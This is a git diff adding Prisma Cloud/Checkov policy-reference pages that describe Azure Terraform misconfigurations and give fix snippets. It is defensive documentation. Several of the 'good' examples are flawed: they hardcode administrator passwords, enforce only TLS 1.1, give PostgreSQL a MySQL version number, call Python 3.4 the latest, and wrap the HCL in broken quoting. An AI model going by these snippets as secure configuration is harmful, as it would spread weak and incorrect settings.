azurerm_mysql_server, azurerm_mysql_server_key + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "ok" { + name = "ok-resources" + location = "West Europe" +} + + +resource "azurerm_key_vault" "ok" { + name = "okkv" + location = azurerm_resource_group.ok.location + resource_group_name = azurerm_resource_group.ok.name + tenant_id = data.azurerm_client_config.current.tenant_id + sku_name = "premium" + purge_protection_enabled = true +} + + +resource "azurerm_key_vault_access_policy" "server" { + key_vault_id = azurerm_key_vault.ok.id + tenant_id = data.azurerm_client_config.current.tenant_id + object_id = azurerm_mysql_server.ok.identity.0.principal_id + key_permissions = ["get", "unwrapkey", "wrapkey"] + secret_permissions = ["get"] +} + + +resource "azurerm_key_vault_access_policy" "client" { + key_vault_id = azurerm_key_vault.ok.id + tenant_id = data.azurerm_client_config.current.tenant_id + object_id = data.azurerm_client_config.current.object_id + key_permissions = ["get", "create", "delete", "list", "restore", "recover", "unwrapkey", "wrapkey", "purge", "encrypt", "decrypt", "sign", "verify"] + secret_permissions = ["get"] +} + + +resource "azurerm_key_vault_key" "ok" { + name = "tfex-key" + key_vault_id = azurerm_key_vault.ok.id + key_type = "RSA" + key_size = 2048 + key_opts = ["decrypt", "encrypt", "sign", "unwrapKey", "verify", "wrapKey"] + depends_on = [ + azurerm_key_vault_access_policy.client, + azurerm_key_vault_access_policy.server, + ] +} + + +resource "azurerm_mysql_server" "ok" { + name = "ok-mysql-server" + location = azurerm_resource_group.ok.location + resource_group_name = azurerm_resource_group.ok.name + sku_name = "GP_Gen5_2" + administrator_login = "acctestun" + administrator_login_password = "H@Sh1CoR3!" + ssl_enforcement_enabled = true + ssl_minimal_tls_version_enforced = "TLS1_1" + storage_mb = 51200 + version = "5.6" + + identity { + type = "SystemAssigned" + } + +} + +resource "azurerm_mysql_server_key" "ok" { + server_id = azurerm_mysql_server.ok.id + key_vault_key_id = azurerm_key_vault_key.ok.id +} + + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-net-framework-version-is-the-latest-if-used-as-a-part-of-the-web-app.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-net-framework-version-is-the-latest-if-used-as-a-part-of-the-web-app.adoc new file mode 100644 index 000000000..d674b885e --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-net-framework-version-is-the-latest-if-used-as-a-part-of-the-web-app.adoc @@ -0,0 +1,59 @@ +== Azure App Service Web app doesn't use latest .Net framework version +// Azure App Service Web app does not use latest version of .Net framework + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 881b44d4-4284-4ac4-896a-d8e45d38a584 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py[CKV_AZURE_80] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure App Service web applications developed with the .NET software stack should use the latest available version of .NET to ensure the latest security fixes are in use. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* dotnet_framework_version - (Optional) The version of the .net framework's CLR used in this App Service. + +Possible values are v2.0 (which will use the latest version of the .net framework for the .net CLR v2 - currently .net 3.5), v4.0 (which corresponds to the latest version of the .net CLR v4 - which at the time of writing is .net 4.7.1) and v5.0. + + +[source,go] +---- +{ + "resource "azurerm_app_service" "example" { + ... + site_config { ++ dotnet_framework_version = "v4.0" + ... + } + +} +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-php-version-is-the-latest-if-used-to-run-the-web-app.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-php-version-is-the-latest-if-used-to-run-the-web-app.adoc new file mode 100644 index 000000000..12dc31f04 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-php-version-is-the-latest-if-used-to-run-the-web-app.adoc @@ -0,0 +1,57 @@ +== Azure App Service Web app does not use latest PHP version +// Azure App Service Web app does not use latest version of PHP + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4402aa89-9823-4858-ae66-e4dfbab33bcc + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py[CKV_AZURE_81] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure App Service web applications developed with the PHP should use the latest available version of PHP to ensure the latest security fixes are in use. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* php_version - (Optional) The version of PHP to use in this App Service. + +Possible values are 5.5, 5.6, 7.0, 7.1, 7.2, 7.3 and 7.4. + + +[source,go] +---- +{ + "resource "azurerm_app_service" "example" { + ... ++ site_config { ++ php_version = "7.4" + } + +}", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-customer-managed-key-for-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-customer-managed-key-for-encryption.adoc new file mode 100644 index 000000000..939911ce3 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-customer-managed-key-for-encryption.adoc @@ -0,0 +1,122 @@ +== PostgreSQL server does not enable customer-managed key for encryption +// PostgreSQL server's customer-managed key for encryption disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4e6e26f4-c923-4eed-b947-2646f6d677d2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml[CKV2_AZURE_17] + +|Severity +|LOW + +|Subtype +|Build +// ,Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Use customer-managed keys to manage the encryption at rest of your PostgreSQL servers. +By default, the data is encrypted at rest with service-managed keys, but customer-managed keys are commonly required to meet regulatory compliance standards. +Customer-managed keys enable the data to be encrypted with an Azure Key Vault key created and owned by you. +You have full control and responsibility for the key lifecycle, including rotation and management. + +// === Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_key_vault, azurerm_key_vault_access_policy, azurerm_key_vault_key, azurerm_postgresql_server, azurerm_postgresql_server_key + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "ok" { + name = "ok-resources" + location = "West Europe" +} + + +resource "azurerm_key_vault" "ok" { + name = "okkv" + location = azurerm_resource_group.ok.location + resource_group_name = azurerm_resource_group.ok.name + tenant_id = data.azurerm_client_config.current.tenant_id + sku_name = "premium" + purge_protection_enabled = true +} + + +resource "azurerm_key_vault_access_policy" "server" { + key_vault_id = azurerm_key_vault.ok.id + tenant_id = data.azurerm_client_config.current.tenant_id + object_id = azurerm_postgresql_server.ok.identity.0.principal_id + key_permissions = ["get", "unwrapkey", "wrapkey"] + secret_permissions = ["get"] +} + + +resource "azurerm_key_vault_access_policy" "client" { + key_vault_id = azurerm_key_vault.ok.id + tenant_id = data.azurerm_client_config.current.tenant_id + object_id = data.azurerm_client_config.current.object_id + key_permissions = ["get", "create", "delete", "list", "restore", "recover", "unwrapkey", "wrapkey", "purge", "encrypt", "decrypt", "sign", "verify"] + secret_permissions = ["get"] +} + + +resource "azurerm_key_vault_key" "ok" { + name = "tfex-key" + key_vault_id = azurerm_key_vault.ok.id + key_type = "RSA" + key_size = 2048 + key_opts = ["decrypt", "encrypt", "sign", "unwrapKey", "verify", "wrapKey"] + depends_on = [ + azurerm_key_vault_access_policy.client, + azurerm_key_vault_access_policy.server, + ] +} + + +resource "azurerm_postgresql_server" "ok" { + name = "ok-pg-server" + location = azurerm_resource_group.ok.location + resource_group_name = azurerm_resource_group.ok.name + sku_name = "GP_Gen5_2" + administrator_login = "acctestun" + administrator_login_password = "H@Sh1CoR3!" + ssl_enforcement_enabled = true + ssl_minimal_tls_version_enforced = "TLS1_1" + storage_mb = 51200 + version = "5.6" + + identity { + type = "SystemAssigned" + } + +} + +resource "azurerm_postgresql_server_key" "ok" { + server_id = azurerm_postgresql_server.ok.id + key_vault_key_id = azurerm_key_vault_key.ok.id +} + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-geo-redundant-backups.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-geo-redundant-backups.adoc new file mode 100644 index 000000000..3fb1910f1 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-geo-redundant-backups.adoc @@ -0,0 +1,56 @@ +== PostgreSQL server enables geo-redundant backups +// PostgreSQL server geo-redundant backup disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 28bac534-b4d1-464d-8ad9-3ed011d53f32 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py[CKV_AZURE_102] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure PostgreSQL allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. +When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. +This provides better protection and ability to restore your server in a different region in the event of a disaster. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_server +* *Arguments:* geo_redundant_backup_enabled - (Optional) Turn Geo-redundant server backups on/off. + + +[source,go] +---- +{ + "resource "azurerm_postgresql_server" "example" { + ... ++ geo_redundant_backup_enabled = true +} + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-infrastructure-encryption-1.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-infrastructure-encryption-1.adoc new file mode 100644 index 000000000..7bcafb674 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-infrastructure-encryption-1.adoc @@ -0,0 +1,54 @@ +== MySQL server disables infrastructure encryption +// MySQL server infrastructure encryption disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a2afadb2-7c9d-4445-bc3b-2304774ca62e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLEncryptionEnaled.py[CKV_AZURE_96] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +Enable infrastructure encryption for Azure Database for MySQL servers to have higher level of assurance that the data is secure. +When infrastructure encryption is enabled, the data at rest is encrypted twice using FIPS 140-2 compliant Microsoft managed keys. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mysql_server +* *Arguments:* infrastructure_encryption_enabled + + +[source,go] +---- +{ + "resource "azurerm_mysql_server" "example" { + ... ++ infrastructure_encryption_enabled = true +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-infrastructure-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-infrastructure-encryption.adoc new file mode 100644 index 000000000..260f1897c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-infrastructure-encryption.adoc @@ -0,0 +1,54 @@ +== PostgreSQL server does not enable infrastructure encryption +// PostgreSQL server infrastructure encryption disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c6c340a1-e862-4d18-b031-5d12a6ab90b1 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py[CKV_AZURE_130] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable infrastructure encryption for Azure Database for PostgreSQL servers to have higher level of assurance that the data is secure. +When infrastructure encryption is enabled, the data at rest is encrypted twice using FIPS 140-2 compliant Microsoft managed keys. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_server +* *Arguments:* infrastructure_encryption_enabled + + +[source,go] +---- +{ + " resource "azurerm_postgresql_server" "example" { + ... ++ infrastructure_encryption_enabled = true + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-threat-detection-policy.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-threat-detection-policy.adoc new file mode 100644 index 000000000..915dad422 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-postgresql-server-enables-threat-detection-policy.adoc @@ -0,0 +1,55 @@ +== PostgreSQL server does not enable Threat Detection policy +// PostgreSQL server Threat Detection policy disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 736b5486-73e5-4d65-a695-24071db8602a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py[CKV_AZURE_128] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable Advanced Threat Detection on your non-Basic tier Azure database for PostgreSQL servers to detect anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_server +* *Arguments:* threat_detection_policy.enabled + + +[source,go] +---- +{ + "resource "azurerm_postgresql_server" "example" { + ... ++ threat_detection_policy { ++ enabled = true + } + + }", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-python-version-is-the-latest-if-used-to-run-the-web-app.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-python-version-is-the-latest-if-used-to-run-the-web-app.adoc new file mode 100644 index 000000000..79e222739 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-python-version-is-the-latest-if-used-to-run-the-web-app.adoc @@ -0,0 +1,57 @@ +== Azure App Service Web app does not use latest Python version +// Azure App Service Web app uses outdated Python version + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| df25ef8c-da56-49f6-b2af-c90d9da01b45 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py[CKV_AZURE_82] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure App Service web applications developed with the Python should use the latest available version of Python to ensure the latest security fixes are in use. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* python_version - (Optional) The version of Python to use in this App Service. + +Possible values are 2.7 and 3.4. + + +[source,go] +---- +{ + "resource "azurerm_app_service" "example" { + ... ++ site_config { ++ python_version = "3.4" +} + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-remote-debugging-is-not-enabled-for-app-services.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-remote-debugging-is-not-enabled-for-app-services.adoc new file mode 100644 index 000000000..cc0ed71bd --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-remote-debugging-is-not-enabled-for-app-services.adoc @@ -0,0 +1,57 @@ +== Azure App Services Remote debugging is enabled +// Azure App Services Remote debugging enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6fd5eaee-2e6d-419b-b380-2fa1a67feaf3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/RemoteDebggingNotEnabled.py[CKV_AZURE_72] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Remote debugging allows you to remotely connect to a running app and debug it from a different location. +While this can be useful for developers who need to troubleshoot issues with their app, it also introduces a potential security risk because it allows someone to remotely access your app and potentially modify its code or behavior. +If remote debugging is enabled for your app services, it could potentially be exploited by an attacker to gain unauthorized access to your app and potentially compromise it. +This could result in data loss, financial damage, or other negative consequences. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* remote_debugging_enabled + + +[source,go] +---- +{ + "resource "azurerm_app_service" "example" { + ... ++ remote_debugging_enabled = false + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-security-contact-emails-is-set.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-security-contact-emails-is-set.adoc new file mode 100644 index 000000000..3e517a9e3 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-security-contact-emails-is-set.adoc @@ -0,0 +1,52 @@ +== Azure Microsoft Defender for Cloud security alert email notifications is not set +// Azure Microsoft Defender for Cloud Security alert email notifications not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8d78bf42-4e80-4e25-89fa-5f8a7fe8ddb1 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py[CKV_AZURE_131] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Azure Security Center recommends adding one valid security contact email address for each Microsoft Azure subscription. +Security Center emails designated administrators using the defined security contact in case the Microsoft security team find Azure cloud resources are compromised. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_contact +* *Arguments:* email - (Required) The email of the Security Center Contact. + + +[source,go] +---- +resource "azurerm_security_center_contact" "example" { ++ email = "contact@example.com" + ... +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-service-fabric-uses-available-three-levels-of-protection-available.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-service-fabric-uses-available-three-levels-of-protection-available.adoc new file mode 100644 index 000000000..76cdc373f --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-service-fabric-uses-available-three-levels-of-protection-available.adoc @@ -0,0 +1,59 @@ +== Service Fabric does not use three levels of protection available +// Azure Service Fabric protection levels not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 11c073b9-2d09-49f9-9bc0-0d710e7ce1ef + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py[CKV_AZURE_126] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Service Fabric provides three levels of protection (None, Sign and EncryptAndSign) for node-to-node communication using a primary cluster certificate. +Set the protection level to ensure that all node-to-node messages are encrypted and digitally signed + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_service_fabric_cluster +* *Arguments:* fabric_settings + + +[source,go] +---- +{ + "resource "azurerm_service_fabric_cluster" "example" { + ... ++ fabric_settings { ++ name = "Security" ++ parameters = { ++ name = "ClusterProtectionLevel" ++ value = "EncryptAndSign" + } + + }", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-sql-servers-enables-data-security-policy.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-sql-servers-enables-data-security-policy.adoc new file mode 100644 index 000000000..719e2ab40 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-sql-servers-enables-data-security-policy.adoc @@ -0,0 +1,98 @@ +== Azure SQL server Defender setting is set to Off +// Microsoft Defender for SQL Server disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4169132e-ead6-4c01-b147-d2b47b443678 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml[CKV2_AZURE_13] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender for SQL provides a new layer of security, which enables customers to detect and respond to potential threats as they occur by providing security alerts on anomalous activities. +Users will receive an alert upon suspicious database activities, potential vulnerabilities, SQL injection attacks, as well as anomalous database access patterns. +Advanced threat protection alerts provide details of suspicious activity and recommend action on how to investigate and mitigate the threat. +//// +=== Fix - Runtime + + +* In Azure CLI* + + + +. Log in to the Azure Portal. + +. Go to the reported SQL server + +. Select 'SQL servers', Click on the SQL server instance you wanted to modify + +. Click on 'Security Center' under 'Security' + +. Click on 'Enable Azure Defender for SQL' +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_sql_server, azurerm_mssql_server_security_alert_policy +* *Arguments:* server_name (of _azurerm_mssql_server_security_alert_policy_ ) + + +[source,go] +---- +{ + "resource "azurerm_sql_server" "sql_server_good_1" { + name = "mysqlserver" + resource_group_name = "group" + location = "location" + version = "12.0" + administrator_login = "4dm1n157r470r" + administrator_login_password = "4-v3ry-53cr37-p455w0rd" +} + + +resource "azurerm_sql_server" "sql_server_good_2" { + name = "mysqlserver" + resource_group_name = "group" + location = "location" + version = "12.0" + administrator_login = "4dm1n157r470r" + administrator_login_password = "4-v3ry-53cr37-p455w0rd" +} + + + +resource "azurerm_mssql_server_security_alert_policy" "alert_policy_good" { + resource_group_name = "group" + server_name = azurerm_sql_server.sql_server_good_1.name + state = "Enabled" + retention_days = 20 +} + + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-storage-accounts-use-customer-managed-key-for-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-storage-accounts-use-customer-managed-key-for-encryption.adoc new file mode 100644 index 000000000..be2b35cf8 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-storage-accounts-use-customer-managed-key-for-encryption.adoc @@ -0,0 +1,115 @@ +== Azure Storage account Encryption CMKs Disabled +// Azure Storage account encryption CMKs disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e5ddf10c-4e61-451b-9df1-d97a948017c3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountsUseCustomerManagedKeyForEncryption.yaml[CKV2_AZURE_18] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +By default all data at rest in Azure Storage account is encrypted using Microsoft Managed Keys. +It is recommended to use Customer Managed Keys to encrypt data in Azure Storage accounts for better control on Storage account data. + +//// +=== Fix - Runtime + + +* In Azure Console* + + + +. Log in to Azure Portal + +. Go to Storage accounts dashboard and Click on reported storage account + +. Under the Settings menu, click on Encryption + +. Select Customer Managed Keys ++ +** Choose 'Enter key URI' and Enter 'Key URI' OR ++ +** Choose 'Select from Key Vault', Enter 'Key Vault' and 'Encryption Key' + +. Click on 'Save'" +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_account_customer_managed_key , azurerm_client_config, azurerm_key_vault, azurerm_key_vault_key + + +[source,go] +---- +{ + "data "azurerm_client_config" "current" {} + +resource "azurerm_key_vault" "example" { + name = "examplekv" + location = "location" + resource_group_name = "group" + tenant_id = data.azurerm_client_config.current.tenant_id + sku_name = "standard" + + purge_protection_enabled = true +} + + +resource "azurerm_key_vault_key" "example" { + name = "tfex-key" + key_vault_id = azurerm_key_vault.example.id + key_type = "RSA" + key_size = 2048 + key_opts = ["decrypt", "encrypt", "sign", "unwrapKey", "verify", "wrapKey"] +} + + + +resource "azurerm_storage_account" "storage_account_good_1" { + name = "examplestor" + resource_group_name = "group" + location = "location" + account_tier = "Standard" + account_replication_type = "GRS" + + identity { + type = "SystemAssigned" + } + +} + +resource "azurerm_storage_account_customer_managed_key" "managed_key_good" { + storage_account_id = azurerm_storage_account.storage_account_good_1.id + key_vault_id = azurerm_key_vault.example.id + key_name = azurerm_key_vault_key.example.name + key_version = "1" +} + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-unattached-disks-are-encrypted.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-unattached-disks-are-encrypted.adoc new file mode 100644 index 000000000..116ddbdd7 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-unattached-disks-are-encrypted.adoc @@ -0,0 +1,99 @@ +== Unattached disks are not encrypted +// Unattached disks not encrypted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6cf0b2e7-dae3-4649-8431-54c2c1e350db + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml[CKV2_AZURE_14] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Encrypting your disks protect your data from unauthorized access or tampering. +That way, you can ensure that only authorized users can access and modify the contents of your disks. +Such action can help protect against external threats such as hackers or malware, as well as internal threats such as accidental or unauthorized access. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_managed_disk, azurerm_virtual_machine +* *Arguments:* encryption_settings.encrypted + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "group" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_managed_disk" "managed_disk_good_1" { + name = "acctestmd" + location = "West US 2" + resource_group_name = azurerm_resource_group.group.name + storage_account_type = "Standard_LRS" + create_option = "Empty" + disk_size_gb = "1" + ++ encryption_settings { ++ enabled = true + } + + tags = { + environment = "staging" + } + +} + + + +resource "azurerm_virtual_machine" "virtual_machine_good_1" { + name = "$vm" + location = "location" + resource_group_name = azurerm_resource_group.group.name + network_interface_ids = ["id"] + vm_size = "Standard_DS1_v2" + storage_image_reference { + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + version = "latest" + } + + storage_os_disk { + name = "myosdisk1" + caching = "ReadWrite" + create_option = "FromImage" + managed_disk_id = azurerm_managed_disk.managed_disk_good_1.id + } + +} + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-also-send-email-notifications-to-admins-and-subscription-owners-is-set-for-an-sql-server.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-also-send-email-notifications-to-admins-and-subscription-owners-is-set-for-an-sql-server.adoc new file mode 100644 index 000000000..b2d351d68 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-also-send-email-notifications-to-admins-and-subscription-owners-is-set-for-an-sql-server.adoc @@ -0,0 +1,104 @@ +== Azure SQL Server ADS Vulnerability Assessment (VA) 'Also send email notifications to admins and subscription owners' is disabled +// Azure SQL Server ADS Vulnerability Assessment (VA) 'Also send email notifications to admins and subscription owners' setting disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7749b15d-ac15-49c9-b97a-c496ec5132aa + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml[CKV2_AZURE_5] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable Vulnerability Assessment (VA) setting 'Also send email notifications to admins and subscription owners'. +VA scan reports and alerts will be sent to admins and subscription owners by enabling setting 'Also send email notifications to admins and subscription owners'. +This may help in reducing time required for identifying risks and taking corrective measures. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_sql_server, azurerm_storage_account, azurerm_storage_container, azurerm_mssql_server_security_alert_policy, azurerm_mssql_server_vulnerability_assessment + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "okExample" { + name = "okExample-resources" + location = "West Europe" +} + + +resource "azurerm_sql_server" "okExample" { + name = "mysqlserver" + resource_group_name = azurerm_resource_group.okExample.name + location = azurerm_resource_group.okExample.location + version = "12.0" + administrator_login = "4dm1n157r470r" + administrator_login_password = "4-v3ry-53cr37-p455w0rd" +} + + +resource "azurerm_storage_account" "okExample" { + name = "accteststorageaccount" + resource_group_name = azurerm_resource_group.okExample.name + location = azurerm_resource_group.okExample.location + account_tier = "Standard" + account_replication_type = "GRS" +} + + +resource "azurerm_storage_container" "okExample" { + name = "accteststoragecontainer" + storage_account_name = azurerm_storage_account.okExample.name + container_access_type = "private" +} + + +resource "azurerm_mssql_server_security_alert_policy" "okExample" { + resource_group_name = azurerm_resource_group.okExample.name + server_name = azurerm_sql_server.okExample.name + state = "Enabled" +} + + +resource "azurerm_mssql_server_vulnerability_assessment" "okExample" { + server_security_alert_policy_id = azurerm_mssql_server_security_alert_policy.okExample.id + storage_container_path = "${azurerm_storage_account.okExample.primary_blob_endpoint}${azurerm_storage_container.okExample.name}/" + storage_account_access_key = azurerm_storage_account.okExample.primary_access_key + + recurring_scans { + enabled = true + email_subscription_admins = true + emails = [ + "email@example1.com", + "email@example2.com" + ] + } + +} +", +} +---- diff --git 